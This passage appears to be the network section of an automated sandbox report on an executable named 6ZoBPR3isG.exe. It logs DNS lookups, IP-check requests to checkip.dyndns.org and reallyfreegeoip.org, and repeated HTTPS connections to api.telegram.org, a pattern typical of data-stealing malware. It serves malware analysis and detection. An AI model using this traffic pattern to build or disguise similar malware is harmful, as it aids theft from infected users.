Jan 10, 2025 22:32:45.869453907 CET	80	50057	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:45.881046057 CET	50058	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:45.881098032 CET	443	50058	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:45.881181002 CET	50058	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:45.882450104 CET	50058	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:45.882462978 CET	443	50058	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:45.922259092 CET	50057	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:46.489509106 CET	443	50058	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:46.491188049 CET	50058	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:46.491215944 CET	443	50058	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:46.491283894 CET	50058	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:46.491292953 CET	443	50058	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:46.910789967 CET	443	50058	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:46.910901070 CET	443	50058	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:46.910975933 CET	50058	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:46.911307096 CET	50058	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:46.914859056 CET	50057	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:46.915863037 CET	50059	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:46.919883966 CET	80	50057	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:46.919951916 CET	50057	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:46.920757055 CET	80	50059	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:46.920833111 CET	50059	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:46.920924902 CET	50059	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:46.925709963 CET	80	50059	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:47.600188017 CET	80	50059	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:47.601461887 CET	50060	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:47.601516962 CET	443	50060	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:47.601630926 CET	50060	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:47.601949930 CET	50060	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:47.601968050 CET	443	50060	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:47.641020060 CET	50059	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:48.235907078 CET	443	50060	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:48.272845030 CET	50060	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:48.272876978 CET	443	50060	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:48.273027897 CET	50060	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:48.273037910 CET	443	50060	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:48.558137894 CET	443	50060	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:48.558245897 CET	443	50060	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:48.558330059 CET	50060	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:48.558801889 CET	50060	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:48.561820030 CET	50059	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:48.563036919 CET	50061	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:48.566782951 CET	80	50059	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:48.566844940 CET	50059	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:48.567936897 CET	80	50061	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:48.568038940 CET	50061	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:48.568164110 CET	50061	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:48.572916031 CET	80	50061	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:49.254148006 CET	80	50061	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:49.255429029 CET	50062	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:49.255470037 CET	443	50062	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:49.255526066 CET	50062	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:49.255986929 CET	50062	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:49.256000996 CET	443	50062	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:49.297267914 CET	50061	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:49.873855114 CET	443	50062	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:49.876137018 CET	50062	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:49.876151085 CET	443	50062	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:49.876368046 CET	50062	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:49.876384020 CET	443	50062	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:50.365202904 CET	443	50062	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:50.365293980 CET	443	50062	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:50.365819931 CET	50062	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:50.365819931 CET	50062	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:50.368936062 CET	50061	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:50.370141983 CET	50063	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:50.373972893 CET	80	50061	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:50.374049902 CET	50061	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:50.374902964 CET	80	50063	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:50.374968052 CET	50063	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:50.375056028 CET	50063	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:50.379782915 CET	80	50063	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:51.058772087 CET	80	50063	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:51.060103893 CET	50064	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:51.060156107 CET	443	50064	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:51.060219049 CET	50064	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:51.060627937 CET	50064	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:51.060641050 CET	443	50064	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:51.109783888 CET	50063	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:51.678354979 CET	443	50064	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:51.680134058 CET	50064	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:51.680164099 CET	443	50064	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:51.682636023 CET	50064	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:51.682641983 CET	443	50064	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:52.064011097 CET	443	50064	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:52.064097881 CET	443	50064	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:52.066638947 CET	50064	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:52.066884995 CET	50064	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:52.069850922 CET	50063	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:52.070765018 CET	50065	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:52.075668097 CET	80	50065	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:52.076401949 CET	80	50063	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:52.076493025 CET	50063	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:52.076622963 CET	50065	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:52.076622963 CET	50065	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:52.081475019 CET	80	50065	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:52.767127991 CET	80	50065	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:52.768431902 CET	50066	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:52.768490076 CET	443	50066	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:52.768687963 CET	50066	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:52.769015074 CET	50066	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:52.769026041 CET	443	50066	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:52.813065052 CET	50065	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:53.377065897 CET	443	50066	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:53.378750086 CET	50066	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:53.378771067 CET	443	50066	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:53.378823996 CET	50066	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:53.378832102 CET	443	50066	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:53.609023094 CET	443	50066	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:53.609132051 CET	443	50066	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:53.613234043 CET	50066	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:53.635360956 CET	50066	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:53.638825893 CET	50065	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:53.642220974 CET	50067	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:53.643955946 CET	80	50065	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:53.645277023 CET	50065	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:53.647075891 CET	80	50067	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:53.650755882 CET	50067	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:53.650755882 CET	50067	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:53.655653954 CET	80	50067	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:54.341869116 CET	80	50067	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:54.346601963 CET	50068	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:54.346649885 CET	443	50068	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:54.351093054 CET	50068	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:54.351093054 CET	50068	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:54.351126909 CET	443	50068	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:54.391132116 CET	50067	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:54.991564989 CET	443	50068	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:54.999075890 CET	50068	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:54.999106884 CET	443	50068	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:54.999253988 CET	50068	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:54.999265909 CET	443	50068	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:55.407962084 CET	443	50068	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:55.408080101 CET	443	50068	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:55.408147097 CET	50068	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:55.408734083 CET	50068	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:55.413398027 CET	50067	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:55.414397001 CET	50069	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:55.418416023 CET	80	50067	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:55.418482065 CET	50067	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:55.419214010 CET	80	50069	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:55.419284105 CET	50069	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:55.419482946 CET	50069	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:55.424216032 CET	80	50069	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:56.110635042 CET	80	50069	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:56.111988068 CET	50070	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:56.112011909 CET	443	50070	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:56.112287045 CET	50070	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:56.112687111 CET	50070	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:56.112694979 CET	443	50070	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:56.156666040 CET	50069	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:56.733030081 CET	443	50070	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:56.735671997 CET	50070	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:56.735706091 CET	443	50070	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:56.735956907 CET	50070	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:56.735965014 CET	443	50070	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:57.073813915 CET	443	50070	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:57.073914051 CET	443	50070	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:57.073978901 CET	50070	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:57.074546099 CET	50070	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:57.078309059 CET	50069	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:57.083359003 CET	80	50069	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:57.083442926 CET	50069	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:57.083910942 CET	50071	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:57.088835955 CET	80	50071	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:57.088924885 CET	50071	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:57.089241028 CET	50071	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:57.094166994 CET	80	50071	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:57.772167921 CET	80	50071	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:57.813607931 CET	50071	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:33:00.404079914 CET	50072	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:33:00.404151917 CET	443	50072	149.154.167.220	192.168.2.3
Jan 10, 2025 22:33:00.404246092 CET	50072	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:33:00.404644012 CET	50072	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:33:00.404660940 CET	443	50072	149.154.167.220	192.168.2.3
Jan 10, 2025 22:33:01.009614944 CET	443	50072	149.154.167.220	192.168.2.3
Jan 10, 2025 22:33:01.011674881 CET	50072	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:33:01.011706114 CET	443	50072	149.154.167.220	192.168.2.3
Jan 10, 2025 22:33:01.011790991 CET	50072	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:33:01.011796951 CET	443	50072	149.154.167.220	192.168.2.3
Jan 10, 2025 22:33:01.420043945 CET	443	50072	149.154.167.220	192.168.2.3
Jan 10, 2025 22:33:01.420137882 CET	443	50072	149.154.167.220	192.168.2.3
Jan 10, 2025 22:33:01.420206070 CET	50072	443	192.168.2.3	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 22:31:27.721029043 CET	59989	53	192.168.2.3	1.1.1.1
Jan 10, 2025 22:31:27.727757931 CET	53	59989	1.1.1.1	192.168.2.3
Jan 10, 2025 22:31:28.809241056 CET	57939	53	192.168.2.3	1.1.1.1
Jan 10, 2025 22:31:28.818209887 CET	53	57939	1.1.1.1	192.168.2.3
Jan 10, 2025 22:31:33.623233080 CET	64071	53	192.168.2.3	1.1.1.1
Jan 10, 2025 22:31:33.631084919 CET	53	64071	1.1.1.1	192.168.2.3
Jan 10, 2025 22:31:35.086478949 CET	58812	53	192.168.2.3	1.1.1.1
Jan 10, 2025 22:31:35.093919992 CET	53	58812	1.1.1.1	192.168.2.3
Jan 10, 2025 22:31:41.835819006 CET	64085	53	192.168.2.3	1.1.1.1
Jan 10, 2025 22:31:41.842905998 CET	53	64085	1.1.1.1	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 10, 2025 22:31:27.721029043 CET	192.168.2.3	1.1.1.1	0x5e9a	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:31:28.809241056 CET	192.168.2.3	1.1.1.1	0xa0d2	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:31:33.623233080 CET	192.168.2.3	1.1.1.1	0x482a	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:31:35.086478949 CET	192.168.2.3	1.1.1.1	0x4034	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:31:41.835819006 CET	192.168.2.3	1.1.1.1	0x9d65	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 10, 2025 22:30:44.982177019 CET	1.1.1.1	192.168.2.3	0xf559	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 22:30:44.982177019 CET	1.1.1.1	192.168.2.3	0xf559	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:31:27.727757931 CET	1.1.1.1	192.168.2.3	0x5e9a	No error (0)	drive.google.com		172.217.16.206	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:31:28.818209887 CET	1.1.1.1	192.168.2.3	0xa0d2	No error (0)	drive.usercontent.google.com		172.217.16.129	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:31:33.631084919 CET	1.1.1.1	192.168.2.3	0x482a	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 22:31:33.631084919 CET	1.1.1.1	192.168.2.3	0x482a	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:31:33.631084919 CET	1.1.1.1	192.168.2.3	0x482a	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:31:33.631084919 CET	1.1.1.1	192.168.2.3	0x482a	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:31:33.631084919 CET	1.1.1.1	192.168.2.3	0x482a	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:31:33.631084919 CET	1.1.1.1	192.168.2.3	0x482a	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:31:35.093919992 CET	1.1.1.1	192.168.2.3	0x4034	No error (0)	reallyfreegeoip.org		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:31:35.093919992 CET	1.1.1.1	192.168.2.3	0x4034	No error (0)	reallyfreegeoip.org		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:31:35.093919992 CET	1.1.1.1	192.168.2.3	0x4034	No error (0)	reallyfreegeoip.org		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:31:35.093919992 CET	1.1.1.1	192.168.2.3	0x4034	No error (0)	reallyfreegeoip.org		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:31:35.093919992 CET	1.1.1.1	192.168.2.3	0x4034	No error (0)	reallyfreegeoip.org		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:31:35.093919992 CET	1.1.1.1	192.168.2.3	0x4034	No error (0)	reallyfreegeoip.org		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:31:35.093919992 CET	1.1.1.1	192.168.2.3	0x4034	No error (0)	reallyfreegeoip.org		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:31:41.842905998 CET	1.1.1.1	192.168.2.3	0x9d65	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.3	49979	132.226.247.73	80	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:31:33.640458107 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:31:34.311220884 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:31:34 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 22:31:34.316279888 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 10, 2025 22:31:34.525429964 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:31:34 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 22:31:41.614938974 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 10, 2025 22:31:41.824558973 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:31:41 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.3	49982	132.226.247.73	80	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:31:42.994663954 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 10, 2025 22:31:43.683789968 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:31:43 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.3	49984	132.226.247.73	80	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:31:44.673602104 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:31:45.355113029 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:31:45 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.3	49987	132.226.247.73	80	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:31:46.384521961 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:31:47.079864025 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:31:46 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.3	49989	132.226.247.73	80	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:31:48.092689991 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:31:48.800211906 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:31:48 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

